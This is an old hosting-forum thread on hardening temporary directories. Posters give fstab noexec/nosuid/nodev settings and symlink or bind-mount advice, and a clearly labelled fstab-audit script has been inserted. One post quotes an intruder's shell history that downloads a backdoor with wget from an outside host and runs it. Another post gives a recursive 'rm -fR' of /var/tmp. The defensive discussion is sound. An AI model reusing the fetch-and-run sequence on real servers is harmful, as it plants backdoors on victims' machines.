Secure /var/tmp?
WebProx 07-03-2004, 10:11 AM I noticed /var/tmp is being used to put DoS scripts in. /tmp has its own partition and is secure, but what can I do for /var/tmp?
Anyone who can point me to the right direction?
Thanks
Jim_UK 07-03-2004, 10:17 AM Remove it and symlink it to /tmp
rm -fR /var/tmp
ln -s /tmp /var/tmp
WebProx 07-03-2004, 10:20 AM Thanks Jim. I was thinking about using a symlink, but I was afraid it would still allow execution.
I've symlinked it now, thanks :)
WebProx 07-03-2004, 10:28 AM Are there other tmp directories?
Also, what does a bash log file do in a tmp dir?
-rw------- 1 nobody nobody 101 Jul 2 16:56 .bash_history
#cat .bash_history
cd /dev/shm
ls
rm cgi
wget http://doptik.100free.com/remap.zip
chmod 775 remap
./remap
rm remap
exit
I ran rkhunter and nothing found.
Steven 07-03-2004, 03:02 PM It means you had someone try to exploit your server with a backdoor.
cd /dev/shm
There might be some goodies there. Also, in your fstab find the /dev/shm line and change it from "defaults" to "rw,noexec,nosuid,nodev" and do mount -a.
WebProx 07-04-2004, 01:53 PM Originally posted by thelinuxguy
It means you had someone try to exploit your server with a backdoor.
cd /dev/shm
There might be some goodies there. Also, in your fstab find the /dev/shm line and change it from "defaults" to "rw,noexec,nosuid,nodev" and do mount -a.
Thank you very much for your informative reply! (as always)
The strange thing is that I already checked it a few minutes after the files were placed there, but couldn't find anything in there.
The fstab:
none /dev/shm tmpfs defaults 0 0
LABEL=/tmp /tmp ext3 defaults,noexec,nosuid,nodev 1 2
If I change the "defaults" to "rw,noexec,nosuid,nodev", should I also change the numbers 0 0? Is the /tmp ok with "defaults" in it?
Steven 07-04-2004, 01:59 PM I would use
"rw,noexec,nosuid,nodev"
for both of them; the numbers 0 0 are fine.
WebProx 07-04-2004, 02:09 PM Originally posted by thelinuxguy
I would use
"rw,noexec,nosuid,nodev"
for both of them; the numbers 0 0 are fine.
Thank you! :gthumb:
sigma 07-05-2004, 01:31 PM Originally posted by Jim_UK
Remove it and symlink it to /tmp
rm -fR /var/tmp
ln -s /tmp /var/tmp
Be careful, some mail handling programs may expect /var/tmp to live in the same partition as /var - that is, you can create a file in /var/tmp and then atomically move it into place elsewhere in /var, preserving its inode and not having any window during which the file is partially written under the new name.
Kevin
ArlinOrlando 09-16-2005, 02:04 AM Hello Everybody!
I found the information on this topic very useful! But I have a doubt...
Instead of:
rm -fR /var/tmp
ln -s /tmp /var/tmp
Can I add this to the fstab?
LABEL=/var/tmp /var/tmp ext3 defaults,noexec,nosuid,nodev 0 0
Steven 09-16-2005, 09:57 AM You would have to use bind,defaults,noexec,nosuid,nodev
ArlinOrlando 09-16-2005, 11:32 AM Hey Steven! Thanks for the reply!
I'm new to this fstab command... Why the need for "bind"?
Can I just use "rw,noexec,nosuid,nodev" like they did on /tmp?
Steven 09-17-2005, 10:59 AM Originally posted by ArlinOrlando
Hey Steven! Thanks for the reply!
I'm new to this fstab command... Why the need for "bind"?
Can I just use "rw,noexec,nosuid,nodev" like they did on /tmp?
They probably have an actual /tmp partition. Somehow I doubt you will have a /var/tmp partition, so you can just drop the LABEL= part.
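The two fstab questions in this thread (do /tmp, /var/tmp and /dev/shm carry noexec,nosuid,nodev, and what does the bind-mount alternative to rm/ln -s look like) can be checked with a small script. The one below is an added example, not code from any poster: it audits a constructed sample fstab (the names SAMPLE_FSTAB, WATCHED, REQUIRED and the function names are mine) and prints the bind line Steven describes, without the LABEL= part.

```shell
#!/bin/sh
# Added example (not from the thread): audit an fstab for the tmp-directory
# hardening discussed above and emit the /var/tmp bind-mount entry.
# It reads a constructed fstab string so it runs offline; swap in
# "$(cat /etc/fstab)" to audit a real host.

# Constructed sample fstab: /tmp is hardened, /dev/shm is not, /var/tmp absent.
SAMPLE_FSTAB='LABEL=/ / ext3 defaults 1 1
LABEL=/tmp /tmp ext3 defaults,noexec,nosuid,nodev 1 2
none /dev/shm tmpfs defaults 0 0
LABEL=/var /var ext3 defaults 1 2'

# Mount points that should never allow execution, setuid binaries or device nodes.
WATCHED="/tmp /var/tmp /dev/shm"
REQUIRED="noexec nosuid nodev"

# fstab_opts MOUNTPOINT FSTAB_TEXT -> prints the options field (4th column)
# of the entry for MOUNTPOINT, or nothing if there is no such entry.
fstab_opts() {
    printf '%s\n' "$2" | awk -v mp="$1" '$1 !~ /^#/ && $2 == mp { print $4 }'
}

# missing_opts MOUNTPOINT FSTAB_TEXT -> one line per required option that the
# entry lacks, or the single word "no-entry" if the mount point is not listed.
missing_opts() {
    opts=$(fstab_opts "$1" "$2")
    if [ -z "$opts" ]; then
        printf 'no-entry\n'
        return 0
    fi
    for want in $REQUIRED; do
        case ",$opts," in
            *",$want,"*) ;;                 # option present, nothing to report
            *) printf '%s\n' "$want" ;;     # option absent
        esac
    done
}

# audit_fstab FSTAB_TEXT -> prints "MOUNTPOINT: missing ..." for every watched
# mount point that fails; returns 1 if anything failed, 0 if all are hardened.
audit_fstab() {
    rc=0
    for mp in $WATCHED; do
        missing=$(missing_opts "$mp" "$1" | tr '\n' ' ')
        missing=${missing% }                # drop the trailing space from tr
        if [ -n "$missing" ]; then
            printf '%s: missing %s\n' "$mp" "$missing"
            rc=1
        fi
    done
    return $rc
}

# bind_line -> the fstab entry that mounts /tmp on top of /var/tmp with the
# same restrictions. The source is a directory, not a device, so no LABEL=.
bind_line() {
    printf '/tmp /var/tmp none bind,defaults,noexec,nosuid,nodev 0 0\n'
}

audit_fstab "$SAMPLE_FSTAB" || echo "fix the entries above, then run: mount -a"
echo "bind-mount alternative to the symlink:"
bind_line
```

After adding the bind entry, confirm the options actually took effect with mount | grep /var/tmp: on older util-linux releases the initial bind mount ignored options other than bind, and a second step, mount -o remount,bind,noexec,nosuid,nodev /var/tmp, was needed before noexec applied. Note that this bind mount puts /var/tmp on the /tmp filesystem, so sigma's caveat about atomic renames between /var/tmp and the rest of /var applies to it just as it does to the symlink.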
bagfull 09-17-2005, 02:21 PM Don't forget to secure or remove /usr/local/apache/proxy as well.
Scott.Mc 09-18-2005, 06:37 AM Arlin,
You will need to look through to see what was exploited. That particular file you listed is a backdoor, it opens a port and allows a way into the server, being logged in as the user that httpd is operating under.
Source of that file ->
<< SNAP >>
DO NOT POST EXPLOIT CODES IN PUBLIC FORUMS
Lots of interesting things << SNAP >>; without going through every single one and just looking at names, every single one of them should not affect a well set up server, and they are very well known.
ArlinOrlando 09-19-2005, 12:23 AM Originally posted by bagfull
Don't forget to secure or remove /usr/local/apache/proxy as well.
So... should I add another line like:
usr/local/apache/proxy ext3 defaults,noexec,nosuid,nodev 0 0?
Steven 09-19-2005, 01:32 AM I usually delete the directory.
ArlinOrlando 09-19-2005, 10:54 AM OK! Thanks Steven! :)
bagfull 09-19-2005, 12:01 PM Originally posted by ArlinOrlando
So... should I add another line like:
usr/local/apache/proxy ext3 defaults,noexec,nosuid,nodev 0 0?
Yes, just delete it!